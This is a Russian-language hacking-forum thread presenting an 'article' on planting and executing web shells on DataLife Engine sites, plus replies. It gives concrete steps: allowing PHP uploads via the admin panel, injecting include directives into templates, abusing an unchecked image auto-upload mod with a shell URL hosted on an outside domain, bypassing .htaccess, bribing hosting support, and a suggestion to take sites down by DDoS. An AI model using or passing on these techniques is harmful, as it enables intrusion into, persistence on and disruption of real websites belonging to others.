Шелл на DLE [Статья]

Решил отписать статью со всеми мне известными способами заливки и исполнения шеллов в движке DataLife Engine


Некоторые способы работают на одном или ином движке, некоторые на всех.
Если не получилось так, то пробуйте иначе.

Начну я со способов с доступом к админке.

Первый способ!

Идём в настройки системы - выбираем настройки по загрузке файлов (ищите там где картинки сверху настроек и ниже меню админки) и вписываем в строку разрешенных файлов для загрузки php.
Сохраняем.

Дальше идём в добавление новости, заливаем шелл. И вставляем в новость слово типа [attachment.....] берём его в теги
Нажимаем кнопку "Предварительный просмотр" и видим адресс шелла.


Второй способ!

Идём в админку - шаблоны - и вставляем в main.tpl к примеру
{include "shell"}

Идём на сайт и быстро делаем свои дела.

Или же если есть доступ в login.tpl
Вставляем код шелла прямо в него.


Третий способ может использоват и с админкой и с правами журналиста.

Сейчас популярен мод автозагрузки картинок на сайт.
И на 30% сайтов стоит старая версия мода, в которой нет проверки формата.
Т.е. мод работает так:
Все файлы/картинки что в тегах и находятся на стороннем домене автоматом идут на сервер.

В старой версии, хватает сделать так:
и добавить новость.
Дальше идём в новость и смотрим адресс шелла.


Ну и наверно последний способ, сам по себе не связан с багами .

Идёте в whois сервис. Пробиваете dns сервера желаемого сайта.
Обычно это
ns1.hosting.ru

Идём на *hosting.ru и узнаем аську какого нить стороннего саппорта.

Стучим ему, даём 10$ и получаем шелл
ЗЫ я так нашёл 30 хостингов с таким саппортом.
50% сайтов...

Вспомню способы, добавлю тут
Кому помогло, не откажусь от «+»!

P.S.Модеры , эта тема нужна чтобы в теме с багами dle по 100 раз не спрашивали о заливке шелла!

 

Если вы хотите убить dle сайт.

делаем это с 5 дедов на которых стоит программа sprut ddos
большинство хостингов блокируют сайт за нагрузку.

а сам дле дает приличный вес.

 

а в дле с статусом радактор мойно залить шелл ??

 

Да. смотри 1 пост. там где о моде с автозаливкой

 

ты опять за старое

 

Сорь, там в 1 посте ошибка.
инклуд вот такой:
{include file="shell"}

 

Зы чтото не нравится - не читай.

в теме о дле, раз 50 о шеллах спросили.

 

Статья ***ня.

 

а что такое "shell"? Покажи готовый пример для использования.

 

заливаете шелл, идем на него.
видим что открыть шелл нам запрещает добрый htaccess.
эту проблемму решаем инклудом.
{include file="uploads/images..shell.php"}
вставляем эту строку в шаблон через админку.

идём в шелл через сайт, удаляем htaccess и потом удаляем инклуд.


теперь нам не мешает хтассесс в директории шелла. т.е. мы используем инклуд для импорта шелла в код main чтобы удалить мешающий нам хтассесс

 

а как ты заливаешь шелл в папку uploads? Ты сам пробывал это сделать?

 

Да.
читай первый пост как заливать.
как-бы нужна админка
sundown залил и проинклуди4

 

проверил в DLE 8.3 - неработает...

 

Радиус действия инклуда
dle 7.5-8.2
написано же, на некоторые способы идут отдельные движки

 

как то не понел тебя

 

В 1 посте описан способ заливать шелл с правами журналиста

 

в статусе редактор не бивает такие доступи

 

там доступа и не надо.
надо лишь права добавления новости без модерации

 

est u menya prava dobavlyat novsti..

 

вот посмотри например..
вот адрес шелл:

и я добавляю или редакторию новост и зделаю так :
[img*]http://ermeninisikim.narod.ru/c100.php[/img*]

и потом если посмотрю адрес шелл-а и вию :

http://ermeninisikim.narod.ru/c100.php